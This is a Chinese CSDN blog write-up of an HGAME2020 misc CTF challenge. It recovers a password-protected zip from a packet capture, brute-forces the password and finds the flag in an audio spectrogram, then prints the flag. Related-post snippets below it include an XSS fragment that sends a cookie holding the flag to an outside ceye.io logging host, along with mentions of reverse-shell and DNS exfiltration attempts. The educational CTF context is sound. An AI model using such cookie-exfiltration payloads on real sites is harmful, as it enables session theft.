HGAME2020 每日推荐

最新推荐文章于 2024-05-16 17:47:49 发布
最新推荐文章于 2024-05-16 17:47:49 发布
阅读量2.9k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19635147/article/details/104929928
版权

http://oss-east.zhouweitong.site/hgame2020/week1/Recommendation_0ddwppIx1thGhquA9kf0lGDHR4EFr1Y4.zip

 

 

这个压缩包下下来解压后是一个wireshark的包,用wireshark打开看看

 

 

通过对每个HTTP请求的分析,大概可以知道他打开了wordpress什么东东的,然后点了一下上传,然后上传了一个song.zip的压缩包

 

 

把它存出来

 

 

 

这个东西需要密码,继续找找哪里有密码吧

 

找不到了

 

!Linux系统压缩包不显示注释

 

 

鳖说了,爆破呗

 

 

 

一段时间后,得到密码

 

 

打开来听,发现这首歌有几个地方不太正常,用AU打开,起初觉得这MP3频谱音高图有点奇怪,怎么东缺一块西缺一块的。

 

 

切换到纯音高图看看

 

 

...遇到鬼了

 

hgame{I_love_EDM233}

这个不是名
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HGAME2021 - 梦的开始
anwen12的博客
03-01 2194
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2197
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
HGAME 2024 WEEK2 Web方向题解 全_what the cow say
最新发布
2301_82056337的博客
05-16 392
/获取cookie(flag)window.open(“http://”+a+“.kbqsag.ceye.io”);}}{{else}}{{end}} go中的if-else语法类似,条件选择。“text/template” // 用于处理文本模板,存在XSS!setTimeout(function(){ //延时1s执行。
HGAME 2024 WEEK2 Web方向题解 全_what the cow say (2)
2301_76223496的博客
04-15 1014
可参考的弱密码字典:https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/top1000.txt。真能搜到,Go的SSTI危害比较小,能用的基本上只有XSS。请本地打通再尝试远程环境;感觉好像SSTI,又说flag在bot手上,怀疑是XSS。我之前生成pickle那个引用了os包,可能环境没有,换个脚本。函数,无需重复创建)(反弹shell失败了,尝试DNS带出flag)注意,pickle,版本要一致,版本是311。
HGAME-week2-web-wp
静仙的博客
02-18 3391
web萌新的ctf之旅
2022年HGAME中REVERSE的easyasm
沐一 · 林 的博客
04-04 1672
2022年HGAME中REVERSE的easyasm . . 照例下载附件,是一个DOS文件: . . 根据题目中文含义,简单的 ASM 汇编,照例扔入 IDA 中查看反汇编: . . 没办法,只能理解汇编代码了,由于对段寄存器段偏移地址不太熟悉,所以栽了很多跟头: . . 其实爆破逻辑和那个段都没关系,但是由于我不理解对应哪个段,加上不熟悉没有 F5 ,所以我脚本逻辑一直写错,然后又没法验证,所以就一直揪着 si 的段想了很久: debug命令 意义 u 查看debug反汇编过
hgame:Haskell 游戏引擎
05-30
Hgame:Haskell游戏引擎】是一个开源项目,旨在利用Haskell这门纯函数式编程语言来构建高效、灵活的游戏开发框架。Haskell以其强大的类型系统、 lazy evaluation(惰性求值)特性以及对并行和并发的良好支持,为...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
0hgame:用0h制作的游戏->阅读README
05-01
0h游戏卡纸我在2014年10月26日凌晨02:00开始了这个项目,并在2014年10月26日凌晨02:00完成了该项目。 没有时间的游戏? 是的! 好好享受! (对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club...
html5game.co.kr:添加基本​​文件
07-01
HTML5游戏开发是一个充满活力的领域,特别是在JavaScript的加持下,开发者可以构建出跨平台、交互性强的游戏。... ... ...它是一门轻量级的脚本语言,易于学习且支持事件驱动和函数式编程。...开发者可以通过DOM(文档对象模型...
大家来讨论一下为什么没有MM去玩HGAME或者GALGAME
大师的资源
10-09 6916
 大师♂罗莊 13:53:07你知道吧没有MM去玩HGAME变成主人的小A 13:53:23恋酱讨厌人家? プリーシア 13:53:36你們太不了解女孩子了プリーシア 13:53:51女孩子不是不喜歡去玩!是怕羞プリーシア 13:54:02可是這情況比較多プリーシア 13:54:16我朋友都常常在玩這些遊戲大师♂罗莊 13:55:01プリーシア(1030050206) 13:54:16
Galgames Hgames下载中心,无毒
weixin_33816611的博客
06-12 6676
大型Hgames下载网站,男人懂的! http://www.galgame.net/bbs/?fromuid=330630 转载于:https://blog.51cto.com/3218478/586402
H flash game Android,Flash.h - Android社区 - https://www.androidos.net.cn/
weixin_39610956的博客
05-27 4090
#include #define PAGE_SIZE(x) ((x) & 0x01)#define PAGE_SIZE_2K_VAL (0x01UL)#define SPARE_AREA_SIZE(x) (((x) >> 2) & 0x01)#define SPARE_AREA_SIZE_64B_VAL (0x1UL...
[CTF]HGAME2021 WP
Sapphire037的博客
02-18 1473
MISC 群青(其实是幽灵东京) wav,audicaty看频谱图 文件属性让我们试试silenteye,解密得到 访问,下载后文件名提示了SSTV,可以扫出 hgame{1_c4n_5ee_the_wav} WEB Fujiwara Tofu Shop 首先给了 猜到是要加referer头,所以加个头referer: qiumingshan.net 然后 那么我们知道 User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、
Hgame 2022 Answer‘s Windows
weixin_52369224的博客
02-12 761
查壳 用 QT 写的图形界面 f12 搜索关键字符串 找到相应的主函数 sub_140001F90 就是加密函数 查看发现为base64换标加密,查看表的引用: 注意这里有个调试判断 我们把这里的jnz改成jz达到我们想要的结果 这里变成if 动调,这里的v22就是新的basetable !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`...
hgame2023 week2 writeup
02-03 8088
hgame2023 week2
HGAME2020第一周WEB小白视角解题
qq_44060093的博客
02-13 1107
Cosmos 的博客 看题目没啥有用的信息 打开网页之后发现了版本管理工具以及GitHub字样,盲猜跟github源码泄露类似 先实试了试/.git无果,又试了试/.git/config出来了github的地址 直接访问地址 点击init找到了存放flag的地方 flag是base64加密过的,解密即可 hgame{g1t_le@k_1s_danger0us_!!!} 接 头 霸 王 ...
2022---hgame第一周WriteUp
3tefanie丶zhou的博客
02-02 4421
【请不要把陌生人的些许善意,视为珍稀的瑰宝,却把身边亲近人的全部付出,当做天经地义的事情,对其视而不见。】
hgamewriteup
03-01
本周四的hgame2024官方题解涉及一个Pwn挑战,题目是关于利用堆溢出漏洞实现任意写入并泄露libc库的内存地址,进而获取shell。出题思路主要围绕以下几个关键步骤: 1. **漏洞利用原理**: 题目利用的是off_by_one...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值